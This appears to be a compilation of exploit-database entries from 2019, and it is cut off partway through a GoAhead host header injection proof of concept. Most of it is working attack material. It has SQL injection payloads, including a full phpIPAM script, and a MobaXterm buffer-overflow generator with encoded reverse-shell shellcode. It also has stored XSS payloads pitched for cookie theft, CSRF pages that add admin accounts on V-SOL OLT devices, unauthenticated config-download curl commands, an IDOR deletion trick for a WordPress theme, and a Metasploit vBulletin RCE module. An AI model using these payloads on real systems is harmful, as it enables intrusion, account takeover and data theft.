# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection # Author: Cakes # Discovery Date: 2019-09-26 # Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point # Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip # Tested Version: 1.1 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Simple SQL injection after application authentication. # POST Request # Parameter: Consignment (POST) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now # Type: UNION query # Title: Generic UNION query (NULL) - 20 columns Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now

# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH) # Author: Xavi Beltran # Date: 2019-08-31 # Vendor: xavibel.com # Vedor Page: https://mobaxterm.mobatek.net/download.html # Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip # Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/ # Description: # SEH based Buffer Overflow in the Username field of a valid session # This exploit generates a malicious MobaXterm sessions file # When the user double clicks in the session, the shellcode is going to be executed # You need to adapt the exploit to your current OS Windows version #!/usr/bin/env python # This is not the IP address of the reverse shell # To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach ip_address = "192.168.1.88" port = "22" # We are going to recreate a MobaXterm sessions file export print ("[+] Creating the malicious MobaXterm file...") sessions_file = "" sessions_file += "[Bookmarks]\n" sessions_file += "SubRep=\n" sessions_file += "ImgNum=42\n" sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%" # Here is the SEH Based Buffer Overflow part # [*] Exact match at offset 16672 # We have to substract 4 that corresponds to NSEH junk1 = "A" * 16668 # Here we need to jump forward but EB is a bad char # We decrease ESP and use a conditional jump after # I have learned this trick in OSCE. Thank you Muts nseh = "" nseh += "\x4C" # DEC ESP nseh += "\x4C" # DEC ESP nseh += "\x77\x21" # JA SHORT 1035FE59 # Using a XP-SP1 so modules are compiled without SafeSEH # !mona seh -cp asciiprint # 0x762C5042 POP-POP-RET crypt32.dll seh = "\x42\x50\x2C\x76" # Some padding that we are going to jump over it junk2 = "\x42" * 29 # We recover the initial state of the stack alignment = "" alignment += "\x44" # INC ESP alignment += "\x44" # INC ESP # And we reach our shellcode # A0 is a badchar but the generated encoded shellcode won't use it # /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp # /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell # Shellcode 636 bytes shellcode = "" shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63" shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32" shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71" shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33" shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e" shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37" shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70" shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e" shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49" shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b" shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54" shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46" shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35" shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76" shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61" shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58" shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42" shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68" shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e" shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50" shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e" shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30" shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d" shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56" shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31" shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b" shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50" shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71" shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d" shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74" shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71" shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e" shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34" shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c" shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69" shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78" shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43" shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61" shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63" crash = junk1 + nseh + seh + junk2 + alignment + shellcode # We need to mantain the MobaXterm sessions file structure sessions_file += crash sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1" # We generate the file f = open( 'pwnd.mxtsessions', 'w' ) f.write(sessions_file) f.close() print ("[+] pwnd.mxtsessions file created!") print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")

# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting # Google Dork: None # Date: 2019-09-14 # Exploit Author: strider # Vendor: http://inoideas.org/ # Software Link: https://github.com/inoerp/inoERP # Version: 0.7.2 # Tested on: Debian 10 Buster x64 / Kali Linux # CVE : None ====================================[Description]==================================== There is a security flaw on the comment section, which allows to make persistant xss without any authentication. An attacker could use this flaw to gain cookies to get into a account of registered users. ====================================[Vulnerability]==================================== extensions/comment/post_comment.php in the server part $$extension = new $extension; foreach ($field_array as $key => $value) { if (!empty($_POST[$value])) { $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities } else { $$extension->$value = ""; } } includes/functions/functions.inc in the server part function mysql_prep($value) { return $value; <-- just returns the value } ====================================[Proof of Concept]==================================== Step 1: http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7 Step 2: open a new question and submit it. Step 3: then paste this PoC-Code below into the comment field and submit that <img src=# onerror="alert(document.cookie);">

# Exploit Title: thesystem 1.0 - 'server_name' SQL Injection # Author: Sadik Cetin # Discovery Date: 2019-09-26 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem # Software Link: https://github.com/kostasmitroglou/thesystem # Tested Version: 1.0 # Tested on OS: Windows 10 # CVE: N/A # Description: # Simple SQL injection after login bypass(login_required didn't used) POST /data/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 330 Connection: close Referer: http://127.0.0.1:8000/data/ Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 Upgrade-Insecure-Requests: 1 -----------------------------18467633426500 Content-Disposition: form-data; name="csrfmiddlewaretoken" 9LsPWlffpiAEGYeCvR9Bead9tslR18flkZRAjREhmqtJpFwNrnSBJXTH245O5sh3 -----------------------------18467633426500 Content-Disposition: form-data; name="server_name" ' or '1=1 -----------------------------18467633426500-- HTTP/1.1 200 OK Date: Thu, 26 Sep 2019 12:16:11 GMT Server: WSGIServer/0.2 CPython/3.5.3 Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 190 (23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')

# Exploit Title: thesystem App 1.0 - Persistent Cross-Site Scripting # Author: İsmail Güngör # Discovery Date: 2019-09-26 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem # Software Link: https://github.com/kostasmitroglou/thesystem # Tested Version: 1.0 # Tested on OS: Windows 10 # CVE: N/A # Description: # Stored XSS after login bypass(login_required didn't used) First of all following request is sent web server POST /data/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------191691572411478 Content-Length: 332 Connection: close Referer: http://127.0.0.1:8000/data/ Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 Upgrade-Insecure-Requests: 1 -----------------------------191691572411478 Content-Disposition: form-data; name="csrfmiddlewaretoken" 0sryZfN7NDe4UUwhjehPQxPRtaMSq85nbGQjmLc9KL79DBOsfK0Plkvp2MwPus75 -----------------------------191691572411478 Content-Disposition: form-data; name="server_name" <h1>test -----------------------------191691572411478-- After following request is sent web server GET /show_search/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1:8000/data/ Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 Upgrade-Insecure-Requests: 1 # Finally, response is shown Xtored XSS: HTTP/1.1 200 OK Date: Thu, 26 Sep 2019 12:25:19 GMT Server: WSGIServer/0.2 CPython/3.5.3 Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 176 ('2019-09-26 14:25:01.878572', '1')('2019-09-26 15:16:11.013642', '1')('2019-09-26 15:21:52.962785', '<h1>test')('2019-09-26 15:23:50.367709', '<script>alert("kale")</script>')

# Exploit Title: thesystem App 1.0 - 'username' SQL Injection # Author: Anıl Baran Yelken # Discovery Date: 2019-09-26 # Vendor Homepage: https://github.com/kostasmitroglou/thesystem # Software Link: https://github.com/kostasmitroglou/thesystem # Tested Version: 1.0 # Tested on OS: Windows 10 # CVE: N/A # Description: # Simple SQL injection after login bypass(login_required didn't used) POST /check_users/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------54363239114604 Content-Length: 327 Connection: close Referer: http://127.0.0.1:8000/check_users/ Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.4.567905900.1569231977 Upgrade-Insecure-Requests: 1 -----------------------------54363239114604 Content-Disposition: form-data; name="csrfmiddlewaretoken" lZVnIo12dzwRuJbCXjjr7cVAQKa4qwhBwdk85Uq4aHpWdqtNTP2rCZB8pmU1uQjj -----------------------------54363239114604 Content-Disposition: form-data; name="username" ' or '1=1 -----------------------------54363239114604-- HTTP/1.1 200 OK Date: Thu, 26 Sep 2019 12:40:24 GMT Server: WSGIServer/0.2 CPython/3.5.3 Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 34 User:('test', '1234', 'test@test')

# Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download # Date: 2019-09-27 # Author: LiquidWorm # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. # Product web page: https://www.vsolcn.com # Affected version: V2.03.62R_IPv6 # V2.03.54R # V2.03.52R # V2.03.49 # V2.03.47 # V2.03.40 # V2.03.26 # V2.03.24 # V1.8.6 # V1.4 Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. Desc: The device OLT Web Management Interface is vulnerable to unauthenticated configuration download and information disclosure vulnerability when direct object reference is made to the usrcfg.conf file using an HTTP GET method. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5534 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php 25.09.2019 -- # PoC 1# curl http://192.168.8.200/device/usrcfg.conf 2# curl http://192.168.8.201/action/usrcfg.conf

# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery # Author: LiquidWorm # Discovery Date: 2019-09-26 # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. # Product web page: https://www.vsolcn.com # Tested on: GoAhead-Webs # Advisory ID: ZSL-2019-5536 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php # Affected version: V2.03.62R_IPv6 # V2.03.54R # V2.03.52R # V2.03.49 # V2.03.47 # V2.03.40 # V2.03.26 # V2.03.24 # V1.8.6 # V1.4 Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. CSRF add admin: --------------- <html> <body> <form action="http://192.168.8.200/action/user.html" method="POST"> <input type="hidden" name="user_name_add" value="Spy" /> <input type="hidden" name="user_password_add" value="pass123" /> <input type="hidden" name="password_confirm_add" value="pass123" /> <input type="hidden" name="user_role" value="1" /> <input type="hidden" name="user_name_mod" value="" /> <input type="hidden" name="user_password_mod" value="" /> <input type="hidden" name="password_confirm_mod" value="" /> <input type="hidden" name="user_role_mod" value="0" /> <input type="hidden" name="option_um" value="100/" /> <input type="hidden" name="who" value="0" /> <input type="submit" value="Init" /> </form> </body> </html> CSRF enable SSH: ---------------- <html> <body> <form action="https://192.168.8.200/action/sshglobal.html" method="POST"> <input type="hidden" name="ssh_enable" value="1" /> <input type="hidden" name="ssh_version" value="2" /> <input type="hidden" name="auth_retries" value="6" /> <input type="hidden" name="ssh_timeout" value="120" /> <input type="hidden" name="ssh_modulus" value="2048" /> <input type="hidden" name="who" value="0" /> <input type="submit" value="Init" /> </form> </body> </html>

# Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting # Google Dork: inurl:/wp-content/themes/zoner/ # Date: 2019-09-24 # Exploit Author: m0ze # Vendor Homepage: https://fruitfulcode.com/ # Software Link: https://themeforest.net/item/zoner-real-estate-wordpress-theme/9099226 # Version: 4.1.1 # Tested on: Parrot OS ----[]- Persistent XSS: -[]---- Create a new agent account, log in and press the blue «Plus» button under the main menu («Add Your Property» text will pop-up on hover) - you will be redirected to https://zoner.demo-website.com/?add-property=XXXX page. Use your payload inside «Address» input field («Local information» block), press on the «Create Property» button and check your payload on the https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties page. Your new property must be approved by admin, so this is a good point to steal some cookies :) Payload Sample: "><img src=x onerror=alert('Greetings from m0ze')> PoC: log in as agentm0ze:WhgZbOUH (login/password) and go to the https://zoner.demo-website.com/author/agentm0ze/?profile-page=my_properties page. ----[]- IDOR: -[]---- Create a new agent account, log in and create a new property. Then go to the https://zoner.fruitfulcode.com/author/aaaagent/?profile-page=my_properties page and pay attention to the trash icon under your property info. Open the developers console and check out this code: <a title="Delete Property" href="#" data-toggle="modal" class="delete-property" data-propertyid="XXX"><i class="delete fa fa-trash-o"></i></a>. Edit the data-propertyid="XXX" attribute by typing instead of XXX desired post or page ID which you want to delete (you can get post/page ID on the <body> tag class -> postid-494, so attribute for post with ID 494 will be data-propertyid="494"). After you edit the ID, click on the trash icon and confirm deletion (POST https://zoner.fruitfulcode.com/wp-admin/admin-ajax.php?action=delete_property_act&property_id=494&security=1304db23f0). Funny fact that you can delete ANY post & page (!) you want, security key is not unique for each requests so it's possible to erase all pages and posts within a few minutes.

# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation # Author: LiquidWorm # Discovery Date: 2019-09-26 # Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. # Product web page: https://www.vsolcn.com # Tested on: GoAhead-Webs # Advisory ID: ZSL-2019-5538 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php # Affected version: V2.03.62R_IPv6 # V2.03.54R # V2.03.52R # V2.03.49 # V2.03.47 # V2.03.40 # V2.03.26 # V2.03.24 # V1.8.6 # V1.4 Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd. Product web page: https://www.vsolcn.com Affected version: V2.03.62R_IPv6 V2.03.54R V2.03.52R V2.03.49 V2.03.47 V2.03.40 V2.03.26 V2.03.24 V1.8.6 V1.4 Summary: GPON is currently the leading FTTH standard in broadband access technology being widely deployed by service providers around the world. GPON/EPON OLT products are 1U height 19 inch rack mount products. The features of the OLT are small, convenient, flexible, easy to deploy, high performance. It is appropriate to be deployed in compact room environment. The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and ICT applications. Desc: The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP POST request setting the parameter 'user_role_mod' to integer value '1' gaining admin rights. <html> <body> <form action="http://192.168.8.200/action/user.html" method="POST"> <input type="hidden" name="user_name_add" value="" /> <input type="hidden" name="user_password_add" value="" /> <input type="hidden" name="password_confirm_add" value="" /> <input type="hidden" name="user_role" value="0" /> <input type="hidden" name="user_password_mod" value="test" /> <input type="hidden" name="password_confirm_mod" value="test" /> <input type="hidden" name="user_role_mod" value="1" /> <input type="hidden" name="option_um" value="17" /> <input type="hidden" name="who" value="1" /> <input type="submit" value="Escalate" /> </form> </body> </html>

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit', 'Description' => %q{ vBulletin 5.x 0day pre-auth RCE exploit. This should work on all versions from 5.0.0 till 5.5.4 }, 'Platform' => 'php', 'License' => MSF_LICENSE, 'Author' => [ 'Reported by: anonymous', # reported by 'Original exploit by: anonymous', # original exploit 'Metasploit mod by: r00tpgp', # metasploit module ], 'Payload' => { 'BadChars' => "\x22", }, 'References' => [ ['CVE', 'CVE-2019-16759'], ['EDB', 'NA'], ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759'] ], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Targeting', { 'auto' => true } ], # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], ], 'DisclosureDate' => 'Sep 23 2019', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) ]) end def check res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), 'encode_params' => false, 'vars_post' => { 'widgetConfig[code]' => "echo shell_exec(\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\');exit;", } }) if res && res.body && res.body.include?('h4x0000r4l1f4') return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Sending payload.....") resp = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), 'encode_params' => false, 'vars_post' => { #'widgetConfig[code]' => "echo " + payload.encoded + "exit;", 'widgetConfig[code]' => payload.encoded, } }) #unless resp and resp.code == 200 # fail_with(Failure::Unknown, "Exploit failed.") #end #print_good("Success!") #print_line(resp.body) end end

#!/usr/bin/env python3 # Exploit Title: phpIPAM Custom Field Filter SQL Injection # Exploit Announcement Date: September 16, 2019 5:18 AM # Exploit Creation Date: September 27, 2019 # Exploit Author: Kevin Kirsche # Vendor Homepage: https://phpipam.net # Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz # Version: 1.4 # Tested on: Ubuntu 18.04 / MariaDB 10.4 # Requires: # Python 3 # requests package # CVE: CVE-2019-16692 # For more details, view: # https://github.com/phpipam/phpipam/issues/2738 # https://github.com/kkirsche/CVE-2019-16692 # Example Output # [+] Executing select user() # [*] Received: [email protected] # [+] Executing select system_user() # [*] Received: [email protected] # [+] Executing select @@version # [*] Received: .4.8-MariaDB-1:10.4.8+maria~b # [+] Executing select @@datadir # [*] Received: /var/lib/mysq # [+] Executing select @@hostname # [*] Received: ubuntu from requests import Session host = "localhost" login_url = f"http://{host}/app/login/login_check.php" exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php" credentials = { "ipamusername": "Admin", "ipampassword": "Password", } payload = { "action": "add", "table": "", } cmds = { "unpriv": [ "select user()", "select system_user()", "select @@version", "select @@datadir", "select @@hostname", ] } if __name__ == "__main__": client = Session() resp = client.post(login_url, data=credentials) if resp.status_code == 200: for cmd in cmds["unpriv"]: print(f"[+] Executing {cmd}") payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`" resp = client.post(exploit_url, data=payload) info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>") print(f"[*] Received: {info}")

# Exploit Title: GoAhead Web server HTTP Header Injection. # Shodan Query: Server: Goahead # Discovered Date: 05/07/2019 # Exploit Author: Ramikan # Vendor Homepage: https://www.embedthis.com/goahead/ # Affected Version: 2.5.0 may be others. # Tested On Version: 2.5.0 in Cisco Switches and Net Gear routers. # Vendor Fix: N/A # CVE : N/A # CVSS v3: N/A # Category: Hardware, Web Apps # Reference : www.fact-in-hack.blogspot.com Vulnerability: Host Header Injection A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in GoAhead web server version 2.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack PS: Affected on most of embedded webservers on hardware such as switches, routers, IOT and IP cameras. POC: 1 Request: POST /goform/login HTTP/1.1 Host: myevilwebsite.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Connection: close Referer: https://46725846267.com/login.asp Upgrade-Insecure-Requests: 1 username=admin&password=admin&language=english Response: HTTP/1.0 302 Redirect Server: Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN Date: Fri Jul 12 15:28:29 2019 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html <html><head></head><body> This document has moved to a new <a href="https://myevilwebsite.com/login.asp">location</a>. Please update your documents to reflect the new location. </body></html> POC: 2 Request: POST /config/log_off_page.htm HTTP/1.1 Host: google.com:443 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 12344 Content-Type: application/x-www-form-urlencoded Content-Length: 774 Connection: close Upgrade-Insecure-Requests: 1 